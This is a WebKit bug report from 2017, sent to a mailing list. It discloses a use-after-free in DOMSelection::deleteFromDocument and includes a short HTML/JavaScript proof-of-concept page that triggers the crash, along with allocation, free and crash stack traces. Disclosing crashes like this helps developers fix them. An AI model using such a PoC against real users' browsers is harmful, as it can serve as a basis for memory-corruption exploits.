[Webkit-unassigned] [Bug 167232] New: WebCore::DOMSelection::deleteFromDocument use after free
bugzilla-daemon at webkit.org
bugzilla-daemon at webkit.org
Thu Jan 19 23:57:50 PST 2017
https://bugs.webkit.org/show_bug.cgi?id=167232
Bug ID: 167232
Summary: WebCore::DOMSelection::deleteFromDocument use after
free
Classification: Unclassified
Product: WebKit
Version: WebKit Local Build
Hardware: Unspecified
OS: Unspecified
Status: NEW
Severity: Normal
Priority: P2
Component: New Bugs
Assignee: webkit-unassigned at lists.webkit.org
Reporter: yuanvi.cn at gmail.com
Environment:
windows 7 Ultimate 64bit
webkit local build with latest git commit d4c655ed0c90d076a473605d752c16adb321764e
enable page heap for MiniBrowser.exe
PoC:
<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">
function start() {
document.getElementById('input_0').disabled = true;
document.getElementById('input_0').setRangeText(319, 193, 273);
window.getSelection().extend(document.getElementById('input_0'));
window.getSelection().deleteFromDocument();
}
</script>
</head>
<body onload="start();">
<input id=input_0 type="search" name="fname"><br>
</body>
</html>
Discription:
Use MiniBrowser open the PoC file, it will cause a uaf crash on {WebKit!WebCore::Node::renderBox [d:\webkit\source\webcore\dom\node.cpp @ 715]}. Note, this reduced PoC won't crash without enable page heap.
I did not investigate this crash thoroughly, so I cannot determine if it is easy exploitable.
Stack backtrace:
RtlAllocateHeap record:
WTF+00059cfc WTF!_malloc_base+0x38 [d:\th\minkernel\crts\ucrt\src\appcrt\heap\malloc_base.cpp @ 29]
WTF+0000645b WTF!WTF::fastMalloc+0xb [d:\webkit\source\wtf\wtf\fastmalloc.cpp @ 182]
WebKit+0078d25b WebKit!WebCore::SearchFieldCancelButtonElement::create+0xb [d:\webkit\source\webcore\html\shadow\textcontrolinnerelements.cpp @ 222]
WebKit+007a9134 WebKit!WebCore::SearchInputType::createShadowSubtree+0xa4 [d:\webkit\source\webcore\html\searchinputtype.cpp @ 117]
WebKit+00449701 WebKit!WebCore::HTMLInputElement::didAddUserAgentShadowRoot+0x11 [d:\webkit\source\webcore\html\htmlinputelement.cpp @ 146]
WebKit+00126def WebKit!WebCore::Element::ensureUserAgentShadowRoot+0x4f [d:\webkit\source\webcore\dom\element.cpp @ 1857]
WebKit+0046bb4f WebKit!WebCore::HTMLInputElement::initializeInputType+0xbf [d:\webkit\source\webcore\html\htmlinputelement.cpp @ 663]
WebKit+001267d4 WebKit!WebCore::Element::parserSetAttributes+0xa4 [d:\webkit\source\webcore\dom\element.cpp @ 1528]
WebKit+0089160a WebKit!WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface+0x20a [d:\webkit\source\webcore\html\parser\htmlconstructionsite.cpp @ 685]
WebKit+0088f524 WebKit!WebCore::HTMLConstructionSite::insertSelfClosingHTMLElement+0x14 [d:\webkit\source\webcore\html\parser\htmlconstructionsite.cpp @ 507]
WebKit+00894369 WebKit!WebCore::HTMLTreeBuilder::processStartTagForInBody+0x6a9 [d:\webkit\source\webcore\html\parser\htmltreebuilder.cpp @ 754]
WebKit+00892e4b WebKit!WebCore::HTMLTreeBuilder::processStartTag+0x54b [d:\webkit\source\webcore\html\parser\htmltreebuilder.cpp @ 1095]
WebKit+00892713 WebKit!WebCore::HTMLTreeBuilder::constructTree+0x23 [d:\webkit\source\webcore\html\parser\htmltreebuilder.cpp @ 356]
WebKit+006e8684 WebKit!WebCore::HTMLDocumentParser::pumpTokenizerLoop+0x224 [d:\webkit\source\webcore\html\parser\htmldocumentparser.cpp @ 260]
WebKit+006e839a WebKit!WebCore::HTMLDocumentParser::pumpTokenizer+0x6a [d:\webkit\source\webcore\html\parser\htmldocumentparser.cpp @ 284]
WebKit+006e7ea4 WebKit!WebCore::HTMLDocumentParser::append+0x194 [d:\webkit\source\webcore\html\parser\htmldocumentparser.cpp @ 391]
WebKit+00144c75 WebKit!WebCore::DecodedDataDocumentParser::appendBytes+0x65 [d:\webkit\source\webcore\dom\decodeddatadocumentparser.cpp @ 50]
WebKit+006c0f5c WebKit!WebCore::DocumentWriter::addData+0x2c [d:\webkit\source\webcore\loader\documentwriter.cpp @ 254]
WebKit+0019287d WebKit!WebCore::DocumentLoader::commitData+0x19d [d:\webkit\source\webcore\loader\documentloader.cpp @ 952]
WebKit+000db050 WebKit!WebFrameLoaderClient::committedLoad+0x20 [d:\webkit\source\webkit\win\webcoresupport\webframeloaderclient.cpp @ 673]
WebKit+001932d5 WebKit!WebCore::DocumentLoader::commitLoad+0x75 [d:\webkit\source\webcore\loader\documentloader.cpp @ 869]
WebKit+0019432c WebKit!WebCore::DocumentLoader::dataReceived+0x7c [d:\webkit\source\webcore\loader\documentloader.cpp @ 984]
WebKit+00193d7e WebKit!WebCore::DocumentLoader::dataReceived+0xe [d:\webkit\source\webcore\loader\documentloader.cpp @ 958]
WebKit+00717a8a WebKit!WebCore::CachedRawResource::notifyClientsDataWasReceived+0x4a [d:\webkit\source\webcore\loader\cache\cachedrawresource.cpp @ 118]
WebKit+007175ab WebKit!WebCore::CachedRawResource::addDataBuffer+0x9b [d:\webkit\source\webcore\loader\cache\cachedrawresource.cpp @ 69]
WebKit+0019f30e WebKit!WebCore::SubresourceLoader::didReceiveDataOrBuffer+0x8e [d:\webkit\source\webcore\loader\subresourceloader.cpp @ 391]
WebKit+0019ec68 WebKit!WebCore::SubresourceLoader::didReceiveBuffer+0x28 [d:\webkit\source\webcore\loader\subresourceloader.cpp @ 371]
WebKit+00199e44 WebKit!WebCore::ResourceLoader::didReceiveBuffer+0x14 [d:\webkit\source\webcore\loader\resourceloader.cpp @ 635]
WebKit+0071e9e3 WebKit!WebCore::SynchronousResourceHandleCFURLConnectionDelegate::didReceiveData+0x33 [d:\webkit\source\webcore\platform\network\cf\synchronousresourcehandlecfurlconnectiondelegate.cpp @ 185]
WebKit+0071e581 WebKit!WebCore::ResourceHandleCFURLConnectionDelegate::didReceiveDataCallback+0x11 [d:\webkit\source\webcore\platform\network\cf\resourcehandlecfurlconnectiondelegate.cpp @ 84]
CFNetwork+0015c5b9 CFNetwork!CFHTTPCookieCreateWithResponseHeaderFields+0xc579:
RtlFreeHeap record:
kernel32+000114dd kernel32!HeapFree+0x14:
WTF+000583e5 WTF!_free_base+0x1c [d:\th\minkernel\crts\ucrt\src\appcrt\heap\free_base.cpp @ 107]
WebKit+00467bcd WebKit!WebCore::HTMLParamElement::`scalar deleting destructor'+0x1d:
WebKit+0016b906 WebKit!WebCore::RangeBoundaryPoint::~RangeBoundaryPoint+0x36:
WebKit+00138e6f WebKit!WebCore::Range::deleteContents+0x1f [d:\webkit\source\webcore\dom\range.cpp @ 470]
WebKit+007620e3 WebKit!WebCore::DOMSelection::deleteFromDocument+0x63 [d:\webkit\source\webcore\page\domselection.cpp @ 378]
WebKit+00983439 WebKit!WebCore::jsDOMSelectionPrototypeFunctionDeleteFromDocument+0x59 [d:\webkit\webkitbuild\release\derivedsources\webcore\jsdomselection.cpp @ 459]
+0000347d Error(Call IDebugControl::ExecuteWide failed HRESULT 0x80040205)
JavaScriptCore+004f359b JavaScriptCore!llint_entry+0x4ac7 [D:\webkit\WebKitBuild\Release\DerivedSources\JavaScriptCore\LowLevelInterpreterWin.asm @ 7940]
JavaScriptCore+004f359b JavaScriptCore!llint_entry+0x4ac7 [D:\webkit\WebKitBuild\Release\DerivedSources\JavaScriptCore\LowLevelInterpreterWin.asm @ 7940]
JavaScriptCore+004ee93d JavaScriptCore!vmEntryToJavaScript+0x10d [D:\webkit\WebKitBuild\Release\DerivedSources\JavaScriptCore\LowLevelInterpreterWin.asm @ 114]
JavaScriptCore+002769d7 JavaScriptCore!JSC::JITCode::execute+0x57 [d:\webkit\source\javascriptcore\jit\jitcode.cpp @ 81]
JavaScriptCore+0025a061 JavaScriptCore!JSC::Interpreter::executeCall+0x191 [d:\webkit\source\javascriptcore\interpreter\interpreter.cpp @ 927]
JavaScriptCore+0038284f JavaScriptCore!JSC::call+0x4f [d:\webkit\source\javascriptcore\runtime\calldata.cpp @ 47]
JavaScriptCore+003829b9 JavaScriptCore!JSC::profiledCall+0x59 [d:\webkit\source\javascriptcore\runtime\calldata.cpp @ 65]
WebKit+004f5942 WebKit!WebCore::JSMainThreadExecState::profiledCall+0x62 [d:\webkit\source\webcore\bindings\js\jsmainthreadexecstate.h @ 75]
WebKit+004cbb1e WebKit!WebCore::JSEventListener::handleEvent+0x3ee [d:\webkit\source\webcore\bindings\js\jseventlistener.cpp @ 143]
WebKit+0010289e WebKit!WebCore::EventTarget::fireEventListeners+0xfe [d:\webkit\source\webcore\dom\eventtarget.cpp @ 253]
WebKit+001026f4 WebKit!WebCore::EventTarget::fireEventListeners+0xd4 [d:\webkit\source\webcore\dom\eventtarget.cpp @ 200]
WebKit+002bcdb0 WebKit!WebCore::DOMWindow::dispatchEvent+0x100 [d:\webkit\source\webcore\page\domwindow.cpp @ 1994]
WebKit+002bce83 WebKit!WebCore::DOMWindow::dispatchLoadEvent+0x83 [d:\webkit\source\webcore\page\domwindow.cpp @ 1952]
WebKit+001137a8 WebKit!WebCore::Document::implicitClose+0x178 [d:\webkit\source\webcore\dom\document.cpp @ 2663]
WebKit+002aedb4 WebKit!WebCore::FrameLoader::checkCompleted+0x84 [d:\webkit\source\webcore\loader\frameloader.cpp @ 825]
WebKit+002aecef WebKit!WebCore::FrameLoader::finishedParsing+0x5f [d:\webkit\source\webcore\loader\frameloader.cpp @ 746]
WebKit+00193dc6 WebKit!WebCore::DocumentLoader::notifyFinished+0x36 [d:\webkit\source\webcore\loader\documentloader.cpp @ 399]
WebKit+00637e6c WebKit!WebCore::CachedResource::finishLoading+0xc [d:\webkit\source\webcore\loader\cache\cachedresource.cpp @ 328]
WebKit+0019ed5a WebKit!WebCore::SubresourceLoader::didFinishLoading+0xca [d:\webkit\source\webcore\loader\subresourceloader.cpp @ 545]
WebKit+00199e65 WebKit!WebCore::ResourceLoader::didFinishLoading+0x15 [d:\webkit\source\webcore\loader\resourceloader.cpp @ 641]
WebKit+0071ea34 WebKit!WebCore::SynchronousResourceHandleCFURLConnectionDelegate::didFinishLoading+0x24 [d:\webkit\source\webcore\platform\network\cf\synchronousresourcehandlecfurlconnectiondelegate.cpp @ 193]
CFNetwork+0015a2a1 CFNetwork!CFHTTPCookieCreateWithResponseHeaderFields+0xa261:
Crash:
0046ec2c 6cb67aa6 WebKit!WebCore::Node::renderBox [d:\webkit\source\webcore\dom\node.cpp @ 715]
0046ec4c 6cb65a1b WebKit!WebCore::RenderSearchField::computeControlLogicalHeight+0xb6 [d:\webkit\source\webcore\rendering\rendersearchfield.cpp @ 148]
0046ec88 6ca8a533 WebKit!WebCore::RenderTextControl::computeLogicalHeight+0xab [d:\webkit\source\webcore\rendering\rendertextcontrol.cpp @ 104]
0046ecbc 6cabb9de WebKit!WebCore::RenderBox::updateLogicalHeight+0x43 [d:\webkit\source\webcore\rendering\renderbox.cpp @ 2780]
0046ecd4 6cabac37 WebKit!WebCore::RenderBlockFlow::updateLogicalHeight+0xe [d:\webkit\source\webcore\rendering\renderblockflow.cpp @ 3227]
0046ed68 6cb66493 WebKit!WebCore::RenderBlockFlow::layoutBlock+0x457 [d:\webkit\source\webcore\rendering\renderblockflow.cpp @ 544]
0046eda8 6cca124c WebKit!WebCore::RenderTextControlSingleLine::layout+0xf3 [d:\webkit\source\webcore\rendering\rendertextcontrolsingleline.cpp @ 119]
0046ee10 6c8a22df WebKit!WebCore::FrameView::layout+0x5ac [d:\webkit\source\webcore\page\frameview.cpp @ 1492]
0046ee30 6c8a237a WebKit!WebCore::Document::updateLayout+0xcf [d:\webkit\source\webcore\dom\document.cpp @ 1907]
0046ee44 6c9bef1e WebKit!WebCore::Document::updateLayoutIgnorePendingStylesheets+0x7a [d:\webkit\source\webcore\dom\document.cpp @ 1941]
0046eeb8 6c9bedc5 WebKit!WebCore::VisiblePosition::canonicalPosition+0x7e [d:\webkit\source\webcore\editing\visibleposition.cpp @ 562]
0046eeec 6c9c23f5 WebKit!WebCore::VisiblePosition::init+0x25 [d:\webkit\source\webcore\editing\visibleposition.cpp @ 60]
0046ef3c 6c9c227e WebKit!WebCore::VisibleSelection::setBaseAndExtentToDeepEquivalents+0x45 [d:\webkit\source\webcore\editing\visibleselection.cpp @ 250]
0046ef58 6c9c1056 WebKit!WebCore::VisibleSelection::validate+0xe [d:\webkit\source\webcore\editing\visibleselection.cpp @ 422]
0046ef68 6c9c4572 WebKit!WebCore::VisibleSelection::VisibleSelection+0xa6 [d:\webkit\source\webcore\editing\visibleselection.cpp @ 67]
0046efe8 6cef1274 WebKit!WebCore::FrameSelection::moveTo+0x32 [d:\webkit\source\webcore\editing\frameselection.cpp @ 165]
0046f02c 6cef212d WebKit!WebCore::DOMSelection::setBaseAndExtent+0x94 [d:\webkit\source\webcore\page\domselection.cpp @ 216]
0046f068 6d113439 WebKit!WebCore::DOMSelection::deleteFromDocument+0xad [d:\webkit\source\webcore\page\domselection.cpp @ 379]
0046f088 0a08347d WebKit!WebCore::jsDOMSelectionPrototypeFunctionDeleteFromDocument+0x59 [d:\webkit\webkitbuild\release\derivedsources\webcore\jsdomselection.cpp @ 459]
--
You are receiving this mail because:
You are the assignee for the bug.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.webkit.org/pipermail/webkit-unassigned/attachments/20170120/8d270a7c/attachment-0001.html>
More information about the webkit-unassigned
mailing list